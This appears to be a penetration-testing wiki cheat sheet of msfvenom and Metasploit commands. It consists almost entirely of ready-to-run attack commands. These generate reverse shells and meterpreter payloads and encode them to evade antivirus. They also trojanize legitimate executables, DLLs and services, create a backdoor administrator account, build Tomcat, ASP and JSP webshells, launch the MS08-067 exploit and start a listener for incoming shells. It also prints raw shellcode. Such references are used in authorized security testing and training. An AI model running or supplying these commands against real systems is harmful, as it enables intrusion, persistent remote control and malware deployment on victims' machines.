Msfvenom payloads

From pentestwiki.org

General commands

$msfvenom -l payloads


$msfvenom --help-formats


Payloads generation

Binary payloads

$msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f c


$msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"


$msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 EXITFUNC=thread -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"


$msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f c -b "\x00\x0a\x0d\x20" –e x86/shikata_ga_nai


$msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f js_le -e generic/none


$msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -o shell_reverse.exe


$msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe


$msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe


$msfvenom -p windows/meterpreter/reverse_https LHOST=$LOCALIP LPORT=443 -f exe -o met_https_reverse.exe


$msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -o shell_reverse.exe


$msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe


$msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe


$msfvenom -p windows/meterpreter/reverse_http LHOST=$LOCALIP LPORT=80 -f exe -e x86/shikata_ga_nai -x /usr/share/windows-binaries/plink.exe -o /var/www/daaa118.exe


$msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP -f exe -k -x calc.exe -o calc_2.exe


Staged payload

$msfvenom -p linux/x86/shell/reverse_tcp LHOST=$LOCALIP LPORT=443 -o staged.out -f elf-so


Non-staged payload

$msfvenom -p linux/x86/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -o non-staged.out -f elf-so


$msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP LPORT=443 -f exe -o meterpreter.exe


Warning: -x must not be UPX compressed

$msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP LPORT=443 -f exe -x /usr/share/windows-binaries/plink.exe -e x86/shikata_ga_nai -o plink-meterpreter.exe


$msfcli windows/smb/ms08_067_netapi RHOST=$IP PAYLOAD=windows/shell/bind_tcp E


$msfvenom -p windows/exec CMD=calc.exe -b "x00" -f py


Create an account:

$msfvenom -p windows/adduser -f exe -o account.exe USER=hack3r PASS=s3cret^s3cret -e x86/shikata_ga_nai -i 20


Trojanize DLL:

$msfvenom -p windows/exec CMD=calc.exe -f dll -o calc.dll


Trojanize Windows Service:

$msfvenom -p windows/exec CMD=calc.exe -f exe-service
$msfvenom -p windows/adduser -f exe-service -o service.exe USER=hack3r PASS=s3cret^s3cret -e x86/shikata_ga_nai -i 20


Get shellcode assembler code:

$msfvenom -p linux/x86/exec cmd=whoami R | ndisasm -u -
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 42 bytes

00000000  6A0B              push byte +0xb
00000002  58                pop eax
00000003  99                cdq
00000004  52                push edx
00000005  66682D63          push word 0x632d
00000009  89E7              mov edi,esp
0000000B  682F736800        push dword 0x68732f
00000010  682F62696E        push dword 0x6e69622f
00000015  89E3              mov ebx,esp
00000017  52                push edx
00000018  E807000000        call 0x24
0000001D  7768              ja 0x87
0000001F  6F                outsd
00000020  61                popa
00000021  6D                insd
00000022  6900575389E1      imul eax,[eax],dword 0xe1895357
00000028  CD80              int 0x80

Get assembler in friendly format to embedded in a python/perl exploit:

$msfvenom -p linux/x86/exec cmd=whoami R | hexdump -v -e '"\\\x" 1/1 "%02x"'
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 42 bytes

\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x07\x00\x00\x00\x77\x68\x6f\x61\x6d\x69\x00\x57\x53\x89\xe1\xcd\x80

Webshells

Tomcat webshell

$msfvenom -p java/meterpreter/reverse_tcp -f war -o tomcatapp.war LHOST=$LOCALIP


$msfvenom -p java/shell_reverse_tcp -f war -o tomcatapp2.war LHOST=$LOCALIP LPORT=442


ASP webshell

$msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f asp -o webshell_reverse_msfvenom.txt


JSP webshell

$msfvenom -p linux/x86/shell/reverse_tcp LHOST=$LOCALIP LPORT=443 -o test.jsp -f jsp


-v payload: specifies the payload name!! Very useful when replacing existing payloads in existent exploits

Using Metasploit and wait for a reverse shell

msf>use exploit/multi/handler
msf>set PAYLOAD windows/meterpreter/reverse_tcp
msf>set LPORT 443
msf>set LHOST $LOCALIP
msf>exploit